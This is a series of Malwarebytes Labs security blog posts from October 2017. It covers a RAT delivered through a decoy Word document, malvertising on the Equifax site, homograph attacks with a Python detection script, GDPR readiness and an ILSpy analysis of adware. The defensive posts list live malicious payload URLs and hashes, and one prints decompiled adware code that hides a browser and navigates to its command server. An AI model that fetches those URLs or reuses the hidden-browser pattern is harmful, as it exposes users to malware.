A cursory look at the site revealed that many other malicious files are also hosted on this platform. We have reached out and requested a takedown of the offending files.

Protection

This type of attack relies on a little bit of social engineering to trick the user into opening a Word document, while the rest is handled by an exploit that was patched just a month ago. It’s quite likely many machines out there are still vulnerable if those updates have not been applied in a timely fashion.

Scanning for the original document at the gateway may not have returned anything due to its relatively benign nature, and this is why protection at the end point is so important. More and more attacks these days are modular and retrieve payloads on the fly in order to evade detection.

Malwarebytes users are already protected against this exploit. Additionally, we detect the RAT as Backdoor.NanoCore.


Indicators of compromise

Initial document (Product Description.docx)

01e45e5647f103ccc99311066d0625f24e79ec8462b131d026b7a557a18d7616

RTF (CVE-2017-8759)

a.pomf.cat/saqlyf.doc 5758c31928c5f962fbb3ec2d07130e189a8cf4f3fbd0cd606cb1c1d165334a1c

PNG (CVE-2017-8759)

a.pomf.cat/uczmbn.png 5ed4582313d593a183ab0b8889dc3833c382ce9ca810287d0fcf982275b55e60

HTA (CVE-2017-8759)

a.pomf.cat/oghujp.hta b048a2d2ea3bb552ac6e79e37fc74576a50c79b4d8c9fd73b1276baabc465ebf

Payload (RAT)

a.pomf.cat/aqzhnk.exe 72041b65777a527667e73ccc5df95296f182e4787f4a349fcbe0220961dd0ed2

The post Decoy Microsoft Word document delivers malware through a RAT appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Equifax, TransUnion websites push fake Flash Player in malvertising campaign

Malwarebytes - Thu, 10/12/2017 - 21:42

Dan Goodin reported on Ars Technica that the Equifax website was involved in yet another kerfuffle, this time pushing a fake Flash Player. Looking at the YouTube video of this incident frame by frame, we were able to retrace some of this malvertising chain.

aa.econsumer.equifax.com (Equifax) -> ostats.net -> webhostingshub.com -> usa.quebec-lea.com -> usa.zeroredirect6.com -> cdn.centerbluray.info (fake Flash)

For those tracking malvertising, this is a very familiar sequence. However, a question remained as to how we got to the ostats[.]net URL. Dan Goodin shared a link about a possible culprit, namely a third-party library which would have been loaded from:

https://aa.econsumer.equifax.com/aad/uib/js/fireclick.js

Since Equifax pulled that site down, it was not possible to identify what that script exactly did. However, a quick search for other websites that were using it returned—surprisingly—another consumer reporting credit agency, namely TransUnion and their Central America website.

By visiting transunioncentroamerica[.]com, we were able to confirm that this fireclick.js script was indeed part of this redirection chain.

This chain ultimately leads to the fake Flash player.

The ostats[.]net domain performs all sorts of redirections, as seen in this RiskIQ PassiveTotal search.

During our tests we encountered fake surveys, Flash updates, and also a redirection to the RIG exploit kit.

Third-party script

Fireclick is a legitimate analytics company. If we look at the script closer, we can see that it loads a URL from the Akamai CDN.

In turn, this loads content from another domain snap.sitestats[.]info.

This eventually leads to ostats[.]net.

Some other websites have the script embedded directly into their main page, and they also are involved in this malvertising campaign.

We are still investigating the incident and will report any updates we find on this blog. In the meantime, Malwarebytes users are protected against malicious redirections from this attack.

Indicators of compromise

Fake Flash player

24dba15691e81192b76327046f34b2a51b0b460ab058dbb411cf02407ebae57f

The post Equifax, TransUnion websites push fake Flash Player in malvertising campaign appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Labs report: summer ushers in unprecedented season of breaches

Malwarebytes - Thu, 10/12/2017 - 16:00

In this edition of the Malwarebytes Cybercrime Tactics and Techniques report for the third quarter of 2017, we saw a number of high-profile breaches targeting the personal information of hundreds of millions of people. While the Equifax breach may have dominated the news cycle, notable attacks against the UK National Health Service (NHS), Instagram, Whole Foods, and Sonic were also reported. In addition, we’ve observed shifts in malware distribution, the revival of some old families, and found cases of international tech support scams.

For the full report, click here. For a summary of the report, check out the video and read on below!

Windows malware

Over the last quarter, we have observed several active spam campaigns pushing the Emotet banking Trojan on Windows systems. This malware makes money by intercepting network traffic and stealing bank account details, then selling them on the black market. In addition, Emotet has also been observed utilizing sophisticated evasion techniques to help hide from security software and spread the infection.

Mac malware

In Mac malware news, we have seen continuous growth and several long-term attackers coming back from the dead: families discovered years ago made a comeback this quarter with new variants.

What this means is that Macs are beginning to attract more persistent adversaries who see the value in infecting Mac users. Apple still has a minority market share in the personal computer world, but they have become increasingly popular and their product’s mythical immunity to malware has been revealed to be just that, a myth.

Android malware

This quarter in Android malware, users have been targeted by a new ‘clicker’ Trojan we call Trojan.Clicker.HYJ. This malware has the capability to spread to other devices by utilizing the victim’s contact list.

Potentially unwanted programs

The adware industry has gone to great lengths to avoid detection by security products, which leaves your system wide open to infection by malware. The adware SmartScreen comes bundled with other PUP software, and its overall goal is to push advertising to any user who installs it. It also hooks into the operations of Windows, blocking security software from running. In the report, we take a deeper look at this pseudo-malware and what it can do.

Tech support scams

Multi-language tech support scams are on the rise globally, driven by geo-targeted malvertising campaigns. We expect an increase in the next quarter.

Webcasts

Put these on your calendars:

On October 25 at 11:00 am (PST) we’re hosting a webinar taking a deeper look at this quarter’s Cybercrime Tactics and Techniques report. Register here.

We’ll be doing a live webcast on November 2 @ noon (PST) on Facebook and YouTube. The event is going to feature Thomas Reed, our Director of Mac Offerings, and we are going to talk about historical Mac malware as well as what you are likely to encounter today, and how to stay safe from it.

Download full report here

We hope you enjoy the latest Cybercrime Tactics and Techniques report. We’d love to hear your feedback. What do you think about developments in cybersecurity this last quarter? What would you like to learn about next quarter? Thanks for reading and safe surfing!

The post Labs report: summer ushers in unprecedented season of breaches appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A new kind of Apple phishing scam

Malwarebytes - Wed, 10/11/2017 - 17:15

In a recent blog post, Felix Krause revealed a method for phishing Apple ID passwords on iOS that would be quite indistinguishable from a real iOS password request. This got us thinking about the ramifications—how else could this tactic be used in the Apple ecosystem, and what kind of damage could it do?

Image courtesy of krausefx.com

In the case of Krause’s iOS phishing scam, by using simple code any app could easily simulate a standard iOS password request, and most users wouldn’t think anything was amiss. Looking at Krause’s example above, I have to admit that this is something I might fall victim to, although I might wonder why the request was showing up within the context of a third-party app.

However, I don’t see this particular phish as a huge risk. iOS apps can only be downloaded through the App Store, and although I would never say that it’s impossible to get a phishing app into the App Store, it certainly would not be an easy thing to do. Not only would the hacker have to sneak this code past the review, they’d also have to create a decoy app that would be compelling enough to download—something that is increasingly difficult even for legitimate developers in the crowded iOS App Store. I view this as possible, but unlikely.

Of course, there are many other cases where the App Store screening process wouldn’t come into play, and that could be equally convincing, if not more so.

For example, consider macOS instead of iOS. Unlike on iOS, Mac users can download apps from anywhere, and frequently do. That’s how Mac users end up infected with things like malware, adware, and unethical junk software. Thus, there’s no review process a hacker would have to submit to.

Suppose you’re using your Mac, and suddenly the Mail app opens and shows a password request because of a failure with your iCloud account. It might look something like the image below. What would you do?

Would you enter your iCloud account password there? After all, it will reliably cite a correct iCloud account address. If you did enter your password in this case, sorry to tell you, you’d be pwned.

Okay, maybe that’s not the most convincing password request if you’re a Mac expert and know what these things are supposed to look like. (I can hear the criticisms now.) However, there are a couple important things to keep in mind.

First, this would trick a LOT of people. Sure, maybe not Mac aficionados, but most people are not, and shouldn’t have to be, experts in what every single macOS dialog looks like.

Second, this was the result of a four-line AppleScript I threw together in all of five minutes, with three of those lines involved in getting the email address associated with the user’s iCloud account. It would be entirely possible to make this far more convincing. Even just using AppleScript, it would be possible to use different techniques, and at least one that I can think of, for which I’ve seen a proof-of-concept, would be highly convincing.

Worse, it would be easy to mimic a real macOS authentication dialog, pixel-for-pixel, without too much effort in an app compiled in Xcode.

In fact, a similar event happened earlier this year, when Handbrake was hacked to install the Proton malware. The malicious copy of Handbrake ended up requesting the login password in such a way that even experts fell for it, such as a developer for the well-respected Panic, Inc.

We have become accustomed to such password requests as a part of our daily life, so when we see them, we tend to just enter the password without thinking about it. After all, Macs don’t get malware, right? Fortunately for Mac users, the actual incidences of this kind of harmful malware have been few, but that works in the hackers’ favor, since we’ve become inured to these requests and don’t treat them with the suspicion that they deserve.

So, what can be done about this kind of thing? Unfortunately, there is no one thing that Apple could do to solve this problem. An app will always be able to display a pixel-perfect simulation of any official macOS or iOS password request.

Worse, even a web developer could do the same, by combining screenshots from the target system and a web form. The code could detect the system and display an appropriate “window” for macOS, iOS, Windows, or Android. Slip something like that in as an overlay on top of a hacked legitimate site and you could fool a lot of folks.

Although Apple could direct the user at all times to a known, good location to enter passwords, that’s not always reasonable. Consider, for example, the horrible user experience Apple has foisted on Mac users with the new User-Approved Kernel Extension Loading process in macOS High Sierra. Although this is not the same as a password request, it’s a good example of how forcing the user to a location for security reasons could go horribly wrong, resulting in a bad user experience that may not actually be significantly more secure.

Instead of seeking fixes for something that can’t be fixed, we need to focus on changing our own behaviors. Every password request should always be viewed with suspicion, no matter the source. If Mail pops open and a window appears asking for a password, that doesn’t mean it’s actually Mail doing the asking.

Treating these password requests with suspicion means, in some cases, canceling and entering the password in a known, good location. For example, if an iCloud password is being requested, you should manually go to the iCloud pane in System Preferences to enter it.

Unfortunately, this is not always possible, as in the case of an installer asking for a password or an app asking for a password to install a helper tool. In the case of Handbrake, it is not normal for Handbrake to ask for a password, so seeing a password request in that context is a red flag. Although I must admit that I might have fallen for the fake Handbrake password request, if I were being more careful, I would check the developer’s website or product documentation to see if that is normal for Handbrake.

If the request comes up while you’re using your web browser, try moving the current web browser window around on the screen. If the “window” moves along with it, it’s not actually a window. It’s an element overlaid on top of the web page meant to look like a window, and that will mean it’s a fake.

It would also be possible to test these password requests by knowingly entering an incorrect password. Phishing malware or websites can’t know what your password is until you enter it, so they can’t know you entered the wrong password intentionally, and will simply accept what you typed. If, on the other hand, the bad password is rejected, it’s likely that the password request is legitimate.

With a little caution and attention paid to the context of password requests, you can avoid most, or even all, phishing attempts. The important thing is to be consistent, and not to get sloppy because you’re in a rush.

The post A new kind of Apple phishing scam appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Make way for the GDPR: Is your business ready?

Malwarebytes - Tue, 10/10/2017 - 17:13

In Week 2 of National Cyber Security Awareness Month (NCSAM), the spotlight is on businesses—particularly, their more profound need to take cybersecurity seriously in this age of breaches. And what better way for them to start this off than to think about how they can improve on handling and storing their clients’ data safely and securely?

If this sounds more like a privacy issue to you, it is. What many should realize is that privacy and security are closely linked. In fact, one cannot think of improving on privacy without improving on security as well, and vice versa.

With the coming of the General Data Protection Regulation (GDPR), a chiefly privacy-focused ruling for companies doing business in Europe, in less than nine months time, a majority of B2C and B2B organizations in the US still have a lot of catching up to do in the matter of compliance. So, without much ado, let’s get down to the nub of what to do to prepare for GDPR’s approach.

Read: National cybersecurity awareness month: simple steps for online safety

  • Prioritize. Senior management must be on board with preparations needed for change to happen. The GDPR is not something your IT department can handle on their own. In fact, the GDPR transcends the boundaries of IT and extends to other areas in the organization, such as marketing and sales. It’s high time for companies to wake up and act fast by putting cybersecurity and data privacy at the top of their priority list.
  • Assess. Take the time to sit down and review your current and target customer base. This is a crucial stage, as the results will dictate whether your business must comply with GDPR standards or not. (Though the bulk of US businesses are small businesses, and not all of them cater to European and UK citizens, even with an online presence.) If your company does handle personal data from citizens of European member states, ascertain what types of data you currently transmit, process, and store. Also, weigh the value of each data type you are storing. Ask yourself this: “Does the company really need to keep this data? Does this bring sufficient value to the company?” If both answers are “no,” it might be best to get rid of it. In June, popular pub and hotel chain JD Wetherspoons decided to delete their full database of client email addresses, which they had used to send email newsletters, after evaluating that they don’t want to hold them anymore. Instead, they decided to use social media to notify patrons of deals and special offers.

    Here are other questions to guide you in your assessment:

    • How do you get personal data from your clients? (e.g., forms in company website)
    • Where do you store client personal data? (e.g., PC hard drive, the cloud)
    • How do you protect stored data?
    • Where are client data backups kept? (e.g., removable storage media)
    • Are there gaps in the current processes or controls you already have in place?
  • Hire. Having a Chief Protection Officer (CPO) or Data Protection Officer (DPO) may be crucial, yet not every organization that controls or processes user data must have a DPO. The GDPR explicitly requires authorities that (1) process personal data, (2) handle a lot of data, and (3) manage “special categories of personal data”—genetic, biometric, and health data, to name a few—to hire or appoint a DPO. Its principal role is to ensure that companies remain compliant with GDPR standards. Organizations that simply don’t have the time or resources to prepare may decide to hire a third-party consultant to help them out, and this is fine, too.
  • Plan. Draft a data protection and mitigation plan that best suits your company. Following a template doesn’t cut it anymore. Plans must be customized to address or reduce the risks that come with how a business processes data. Also, firms with privacy policies in place must revamp them to cover extended rights that are given to EU and UK nationals. To guide you on how to go about doing this, try answering these questions:
    • How will you keep the stored data safe? (e.g., encryption)
    • How should you handle requests from clients to delete their data?
    • How can you make data available to clients?
    • How can you make client data portable?
    • What should your incident response, in the event of a breach, look like?
  • Implement. Now that you made the assessment, hired a consultant, and answered the questions and planned around them, it’s time to put those plans into action. Start backing up files, encrypting them if you think it’s necessary, limiting access to sensitive data to specific individuals only, training up your staff about your security and privacy policies, and making sure that all your supply chains have been informed and confirmed to be on board with the changes.
  • Test. If you have envisioned and drafted an incident response plan, you should put it to the test. See how well the relevant teams in your organization handle a pretend breach based on the new protocol, identify the good points and bad points from it, and make the necessary adjustments to remove or at least minimize the latter. After changes are made, further refine the terms by testing them again and again.
  • Persevere. Starting is one thing, but keeping your plan in place is another. Businesses must continue to remain compliant in the long term by doing a continuous assessment and process improvement. This also includes the regular training of employees and continuing to adhere to a culture of security and privacy in the workplace.

The coming of the GDPR has caused a lot of businesses to recoil out of fear and hype. Unfortunately, this also resulted in them putting off making the much-needed improvements to their data processing activities and security. While there are penalties for non-compliance, this shouldn’t be the main reason why companies must go through the ordeal of what we have listed above. It all boils down to businesses taking better care of their clients by protecting their data. Not only will this foster customer loyalty, but it also allows the company to stay in business.

The post Make way for the GDPR: Is your business ready? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

A week in security (October 02 – October 08)

Malwarebytes - Mon, 10/09/2017 - 20:26

Last week, we gave you some tips for National Cybersecurity Awareness Month, walked through an exploration of a small adware file, and explored the complicated world of the Homograph attack. Here’s what else happened in security.

VB2017

Many of our team members attended VB2017 in Madrid, one of the premier yearly security conferences that brings together researchers, companies, law enforcement, and more in an effort to explore the latest security research. Here’s a collection of articles from The Register’s John Leyden, who was in attendance:

  • Bulletproof hosts stay online by operating out of disputed backwaters: A look at how dubious hosts are retreating to places where they can continue to offer dubious services.
  • Spy vs. spy vs. hacker vs… who is THAT? Everyone’s hacking each other: The problem of Intel gathering when everyone is muddying the waters.
  • Hey, IoT vendors. When a paediatric nurse tells you to fix security, you definitely screwed up: The alarming world of IoT medical devices.
  • Avast urges devs to secure toolchains after hacked build box led to CCleaner disaster: An interesting look at the timeline behind the recent CCleaner issues.
  • Video games used to be an escape. Now not even they are safe from ads: My own talk, where I explore the long(ish) history of Advergaming, tricks used to force you to look at ads in games, and how it threatens to reshape many of your real-world interactions via augmented reality. Once the VB talks are uploaded to YouTube, I’ll be linking to many of them.
Other news

Stay safe everyone!

The post A week in security (October 02 – October 08) appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Out of character: Homograph attacks explained

Malwarebytes - Fri, 10/06/2017 - 15:00

In April, Xudong Zheng, a security enthusiast based in New York, found a flaw in the way some modern browsers handle domain names. Although Chrome, Firefox, and Opera already had security measures in place to warn users that a destination might not be the legitimate site they took it for, at that time these browsers did not flag a fake domain name composed entirely of Latin look-alike characters taken from another language. Zheng demonstrated this by creating and registering a proof-of-concept (PoC) page for the domain аррӏе.com, written in pure Cyrillic characters.

What is a homograph attack?

A homograph attack is a method of deception in which a threat actor leverages the similarities between character scripts to create and register phony versions of existing domains, fooling users into visiting them. This attack has several known aliases: homoglyph attack, script spoofing, and homograph domain name spoofing. Characters—i.e., letters and numbers—that look alike are called homoglyphs or homographs, hence the name of the attack. Examples are the Latin small letter O (U+006F) and the digit zero (U+0030). Hypothetically, one might register bl00mberg.com or g00gle.com and get away with it. But in this day and age, such simple character swaps are easily detected.

In an internationalized domain name (IDN) homograph attack, a threat actor creates and registers one or several fake domains using at least one look-alike character from a different language. Again, hypothetically, one might register gοοgle.com, but not before swapping the Latin small letter O (U+006F) with the Greek small letter Omicron (U+03BF).

Zheng’s PoC is another example of an IDN homograph attack, so let’s list each character he used to illustrate how this particular attack can be highly successful and dangerous if used in the wild. Interestingly, an operating system’s typeface of choice can make it easy or difficult for users to visually distinguish non-Latin characters from Latin ones.

Table 1: We used Segoe UI, Microsoft’s system-wide typeface, here.

To the human eye, these Cyrillic glyphs can easily be confused with their Latin counterparts. Computers, however, read these confusables differently, as we can see from the different hex codes assigned to them.

Table 2: We used San Francisco, Apple’s system-wide typeface, here. It’s worth noting that OS X distinguishes the Cyrillic small letter Palochka from the Latin small letter L; however, it cannot show the difference between the Latin small letter L and the Latin capital letter I, as in the text “Cyrillic small letter Ie”.

According to this bug report, it seems that even the system-wide font for Linux doesn’t distinguish confusable characters either.

The use of all-Cyrillic glyphs—or any other non-Latin characters for this matter—for domain names isn’t the problem. IDN has made it possible for internet users around the globe to create and access domains using their native language scripts. The problem is when these glyphs are misused to deceive internet users.

Is this a new form of online threat?

Homograph attacks have been around for years. As far as we know, Zheng’s PoC was the first of its kind to make headlines and spark a conversation among internet users.

Below are other examples of homographed domains and how they were used:

  • To raise awareness, a security consultant highlighted the common misconception that sometimes a Latin capital letter I (U+0049) looks similar to a Latin small letter L (U+006C) by registering a fake Lloyds Bank website and adding an SSL certificate to it to make it look as legitimate as the real one.
  • A security researcher from NTT Security shared his experience about a friend of his who received several Google Analytics spam containing the domain, secret[DOT]ɢoogle[DOT]com. The “ɢ” there wasn’t the Latin capital letter G (U+0047) but a Latin letter small capital G (U+0262).
  • A security researcher from NewSky Security found an impersonated Adobe website serving the Betabot malware, pretending to be an Adobe Flash Player installer file. The threat actor used the Latin small letter B with Dot below (U+1E05) to replace the Latin small letter B (U+0062) in “adobe.com”.
How is this different from typosquatting?

Although typosquatting also uses visual tricks to deceive users, it relies heavily on users mistyping a URL in the address bar, hence, the “typo” in its name.

Are all homograph attacks just phishing attacks?

Not necessarily. Although homograph attacks usually involve phishing, threat actors could create fake yet believable websites for other fraudulent purposes or to introduce malware onto user systems, as in the case of the bogus Adobe website we mentioned earlier.

In this in-depth report about IDN homograph attacks, our friends at Symantec have noted that several homographed domains they found were either part of a malvertising network, hosting exploit kits and malicious mobile apps, or generated by botnets.

How can we protect ourselves from homograph attacks?

Browser tools such as Punycode Alert and the Quero Toolbar have been created to alert users to potential homograph attacks. Users can adopt them alongside the built-in security mechanisms in today’s browsers. However, no tool can replace vigilance when browsing online and solid cybersecurity hygiene. This includes:

  • Regularly updating your browser (it may be your first line of defense against homograph attacks)
  • Confirming that the legitimate site you’re on has an EVC
  • Avoiding clicking links from emails, chat messages, and other publicly available content, most especially social media sites, without ensuring that the visible link is indeed the true destination
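As an added example (not code from the original post), the following Python script applies the checks discussed above to a hostname: it flags labels that mix scripts (the Greek omicron case), labels built from look-alike glyphs that collapse to plain ASCII (the all-Cyrillic apple.com PoC), digit-for-letter swaps (bl00mberg), and shows the Punycode (xn--) form the browser actually resolves. The confusable table is a small hand-built one covering only the characters mentioned in this post, not the full Unicode confusables list, and the function names are our own.

```python
import unicodedata

# Hand-built look-alike table covering the glyphs discussed in the post
# (constructed for this example; not the full Unicode confusables list).
# Maps a non-ASCII glyph to the ASCII letter it is mistaken for.
CONFUSABLES = {
    "\u0430": "a",  # CYRILLIC SMALL LETTER A
    "\u0435": "e",  # CYRILLIC SMALL LETTER IE
    "\u043e": "o",  # CYRILLIC SMALL LETTER O
    "\u0440": "p",  # CYRILLIC SMALL LETTER ER
    "\u04cf": "l",  # CYRILLIC SMALL LETTER PALOCHKA
    "\u03bf": "o",  # GREEK SMALL LETTER OMICRON
    "\u0262": "g",  # LATIN LETTER SMALL CAPITAL G
    "\u1e05": "b",  # LATIN SMALL LETTER B WITH DOT BELOW
}
# Digits commonly swapped for letters (the bl00mberg / g00gle case).
DIGIT_LOOKALIKES = {"0": "o", "1": "l"}


def script_of(ch):
    """Rough script of a character: the first word of its Unicode name.
    Digits and hyphens are 'COMMON' so they never count as a second script."""
    if ch == "-" or ch.isdigit():
        return "COMMON"
    name = unicodedata.name(ch, "")
    return name.split(" ", 1)[0] if name else "UNKNOWN"


def analyze_label(label):
    """Check one DNS label (the part between dots) for homograph tricks."""
    label = label.lower()
    scripts = {script_of(c) for c in label} - {"COMMON"}
    # 'Skeleton': the label with every known look-alike replaced by the ASCII
    # letter it imitates. If a non-ASCII label collapses to pure ASCII, every
    # foreign glyph in it had an ASCII twin, which is the apple.com PoC case.
    skeleton = "".join(CONFUSABLES.get(c, c) for c in label)
    findings = []
    if len(scripts) > 1:
        findings.append("mixed-script")       # e.g. Greek omicron in google
    if not label.isascii() and skeleton.isascii():
        findings.append("looks-like-ascii")  # whole label mimics an ASCII name
    if any(c.isalpha() for c in label) and any(d in label for d in DIGIT_LOOKALIKES):
        findings.append("digit-lookalike")   # letters mixed with 0/1
    try:
        # What the browser actually resolves: the Punycode (xn--) form.
        ascii_form = label.encode("idna").decode("ascii")
    except UnicodeError:
        ascii_form = None
        findings.append("invalid-idn")
    return {
        "label": label,
        "scripts": sorted(scripts),
        "skeleton": skeleton,
        "ascii": ascii_form,
        "findings": findings,
    }


def analyze_hostname(hostname):
    """Analyze every label of a hostname; 'suspicious' is True if any label
    triggered a finding."""
    labels = [analyze_label(part) for part in hostname.strip(".").split(".")]
    return {
        "hostname": hostname,
        "labels": labels,
        "suspicious": any(item["findings"] for item in labels),
    }


if __name__ == "__main__":
    # Constructed samples taken from the cases the post describes.
    samples = [
        "\u0430\u0440\u0440\u04cf\u0435.com",  # Zheng's all-Cyrillic apple.com
        "g\u03bf\u03bfgle.com",                # Greek omicron for 'o'
        "secret.\u0262oogle.com",              # Latin small capital G
        "ado\u1e05e.com",                      # Latin b with dot below
        "bl00mberg.com",                       # zeros for o's
        "apple.com",                           # legitimate
    ]
    for host in samples:
        report = analyze_hostname(host)
        for item in report["labels"]:
            if item["findings"]:
                print(f"{host}: label {item['label']!r} -> {item['ascii']} "
                      f"skeleton={item['skeleton']!r} {item['findings']}")
        if not report["suspicious"]:
            print(f"{host}: no findings")
```

Browsers that display the xn-- form for mixed-script or whole-script-confusable labels are doing a stricter version of this same analysis; the "skeleton" is what a user should compare against the site they meant to visit.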

Remember: Eyes open.

Stay safe!

 

The Malwarebytes Labs Team

The post Out of character: Homograph attacks explained appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Using ILSpy to analyze a small adware file

Malwarebytes - Thu, 10/05/2017 - 16:19

My curiosity was triggered when the telemetry of our heuristic scanner started showing a multitude of reports about a small file called grandfather.exe, so I went out to grab a copy and have a look at it.

As you can probably tell from some of the detection names on VirusTotal, this is an MSIL (Microsoft Intermediate Language) file. There are a lot of tools to decompile MSIL executables, but ILSpy is my personal favorite. To demonstrate why, I will show you how I analyzed this very small executable that is part of the Adware.Dotdo family.

Using ILSpy

Once you have downloaded and unzipped the binaries from their site, you can run ILSpy.exe and click File > Open to navigate to the file you want to look at.

One advantage of ILSpy is that the code is shown in a very clear format. Even just knowing how to read pseudocode and where to find .NET documentation will get you a long way, as I’m about to demonstrate.

The code in the example

Code is shown in C# format

In this code slice, where the most important part of the program is initialized, we see three methods of hiding the program parts from the user:

  • The program will not be shown in the taskbar
  • The opacity is set at 0% which means you will see right through it
  • And the program will not show any error prompts in case any script errors occur

By the way, if you are more comfortable with coding or reading code in VB.net, you can set ILSpy to show the code in that format.

Code is shown in VB format

The strings in the code above have been obfuscated in a very simple way. Just enough to throw someone who is merely looking at strings off track.

After applying Replace("28851129", string.Empty), which is appended to all the strings in that part of the code, this is what’s left of the two functions that will later be used as event handlers:

 

Private Sub ie(sender As Object, e As EventArgs)
    ' Enable navigation on the hidden browser control and load the (deobfuscated) URL
    Me.i.AllowNavigation = True
    Me.i.Navigate("http://www.munificentspitz.pw/lgH2Rx0Rx1Rx70H82lgH1Rx.asp?inflammable=2017-08-21&pianoforte=01A0oKsMVTiSlSZzVJC1")
End Sub

 

The event handler above simply navigates to the obfuscated URL.

 

Private Sub i(sender As Object, e As WebBrowserDocumentCompletedEventArgs)
    ' DocumentCompleted handler: redirect unless the loaded page is already titled "searchbox"
    If Me.i.Document.Title <> "searchbox" Then
        Me.i.Navigate("http://www3.munificentspitz.pw/lgH2Rx0Rx1Rx70H82lgH1Rx.asp?inflammable=2017-08-21&pianoforte=01A0oKsMVTiSlSZzVJC1")
    End If
End Sub

 

This event handler determines where the browser connects to, based on the title of the current document. If the title of the site does not match “searchbox” then it simply redirects the user to the URL that is obfuscated. If the title already is “searchbox” it will do nothing.

This is where the browser control (‘this’) is initialized while the layout of the main Window (‘base’) is postponed until the browser is ready to go. All the control’s edges are docked to the edges of its containing control and sized appropriately. The browser will resize to fit all of the empty space in its parent container with the DockStyle.Fill property set.

Then the location, size, and name are set, but also the control is hidden by setting the “.visible” property to “false”.

When the new document is fully loaded, the DocumentCompleted event occurs, and the event handler is the (lightly) obfuscated function we discussed earlier, so that will be triggered.

The AutoScaleDimensions property represents the DPI or font setting of the screen that the control was scaled to or designed for. Specifically, at design time this property will be set by the Windows Forms designer to the value your monitor is currently using. The “Font” is auto-scaled as well, relative to the dimensions of the font the classes are using, which is typically the system font.

Then after the browser control has been added to the base application, the first event handler is called which, as mentioned earlier, hides the main window and initializes the browser.

Summary

The “program” stays completely hidden from the user, but tries to contact two different websites on the same domain, probably with the intention to fetch further instructions. At the moment of writing, the site contains two iframes connecting to videojelly[.]com and whos.amung[.]us, a visitors counter.

I tried to show why I like ILSpy as a tool to decompile .NET and browse the assembly.

The file we looked at has:

SHA-256: 53ac5aa31468ad9c14b179b8fd9ab2eed19cbbf2f5f4de97c9255be6f2af6240

Grandfather.exe is now detected as Adware.Dotdo.

 

Pieter Arntz

The post Using ILSpy to analyze a small adware file appeared first on Malwarebytes Labs.

Categories: Techie Feeds

National cybersecurity awareness month: simple steps for online safety

Malwarebytes - Mon, 10/02/2017 - 19:00

With each new devastating breach of security—Equifax, Deloitte, and Sonic, to name a few recent cyber fails—the need for increased cybersecurity awareness has never been more apparent. It’s a good thing, then, that this month is National Cybersecurity Awareness Month (NCSAM).

Observed every October since 2004, NCSAM was created by the Department of Homeland Security and the National Cyber Security Alliance to ensure that every American has the resources they need to stay safer and more secure online. According to the Department of Homeland Security, NCSAM was designed to “engage and educate public and private sector partners through events and initiatives to raise awareness about the importance of cybersecurity, provide them with tools and resources needed to stay safe online, and increase the resiliency of the nation in the event of a cyber incident.”

NCSAM is broken down into weekly themes, including online safety for consumers, securing business networks, looking ahead to the security of future technologies, careers in cybersecurity, and securing infrastructure.

And now Malwarebytes is doing its part. Each week on Labs, we’ll focus on a theme and provide helpful articles, useful tips, and valuable analysis so that you can increase awareness and spread the word. This week’s theme: simple steps to online safety.

Week 1 of NCSAM features the STOP. THINK. CONNECT. campaign, which provides easy, actionable advice for safe surfing. STOP: make sure security measures are in place. THINK: about the consequences of your actions and behaviors online. CONNECT: and enjoy the Internet.

Sounds pretty simple, right? But what exactly does it mean? Here’s our interpretation.

Make sure security measures are in place

It’s often mind-numbing to think about all the things you should and shouldn’t be doing online. Here’s where you use technology to do the heavy lifting. Make sure you’ve got the following equipped on your home computer:

  • Firewall
  • Cybersecurity program that includes technology to block malware, ransomware, adware, and other advanced threats
  • Password manager
  • Wifi secured with password (for mobile devices/streaming)

To learn more about how to proactively protect against various forms of cybercrime, take a look at a few of our articles:

How to beat ransomware: prevent, don’t react

10 easy ways to prevent malware infection

Top 10 ways to secure your mobile phone

Why you don’t need 27 different passwords

With these in place, you can keep out a good chunk of the bad stuff, even if you “misbehave” online. However, human error still accounts for a lot of infections. So that’s why the next step is important.

Think about the consequences of your actions and behaviors online

Sure, you may have layers upon layers of security in place, and that’s going to help. But if you invite a criminal into your home, you’ve pretty much negated any security system you might have deployed. And that’s what happens when you ignore basic online hygiene.

To refresh your memory, there are a few things you need to keep an eye out for/be skeptical of:

  • Tech support scams (Microsoft won’t call you)
  • Phishing emails (is this really your bank asking you to update personal info?)
  • IRS phone calls/texts/emails (they mail you letters)
  • Online shopping on unsecured sites (look for the lock next to the URL)

We could go on, of course, but this general advice is good for all actions online: Does it seem too good to be true? If so, it probably is. Always treat information you encounter with a good sense of skepticism. And for more detailed advice, you can check out these Labs articles:

Tech support scams help and resource page

Something’s phishy: How to detect phishing attempts

Hacking your head: How cybercriminals use social engineering

Connect and enjoy the Internet

If you’re securing your home computer with the proper technologies and making cybersecurity awareness a priority (and if you’ve read this far, that means you are), then you can safely connect to the Internet and enjoy all the cat videos you want to your heart’s content. Sadly, there’s no such thing as being 100 percent secure—online or in life—but you can breathe easier knowing you’re doing the right things and acting responsibly.

Now onward! Go forth, spread the word, and stay tuned for NCSAM’s Week 2 theme: cybersecurity in the workplace is everyone’s business.

Happy surfing!

The post National cybersecurity awareness month: simple steps for online safety appeared first on Malwarebytes Labs.


A week in security (September 25 – October 01)

Malwarebytes - Mon, 10/02/2017 - 16:59

Recently, we talked about the hacking incident at Deloitte, one of the ‘big four’ global accounting firms. It was reported that client email addresses, usernames, and passwords were exposed. This also brought to light weaknesses in their policies and a lack of threat intelligence to recover leaked data. We advised Deloitte clients the following: do an inventory of email addresses used to correspond with the company, review network outbound traffic, determine what information might have leaked in the hack, and (more importantly) maintain security best practices to avoid a repeat of hacks like this.

Patrick Wardle, an acclaimed security researcher, found a keychain vulnerability in High Sierra, Apple’s new macOS operating system. This revelation, unfortunately, spurred a lot of articles that one may deem as bordering on FUD (fear, uncertainty, doubt). So our resident Mac expert, Thomas Reed, set some records straight.

Senior Malware Analyst Nathan Collier likened BlueBorne, the new attack vector using Bluetooth technology, to influenza. First discovered by Armis Labs, BlueBorne can potentially affect billions of devices across multiple platforms. In the piece, Collier stressed the importance of Bluetooth security and agreed with Armis’s prediction that Bluetooth vulnerabilities would continue to be seen in the future.

Lastly, Lead Malware Intelligence Analyst Jérôme Segura discussed some discoveries last week about cryptocoin mining, malvertising, tech support scam, and targeted attacks.

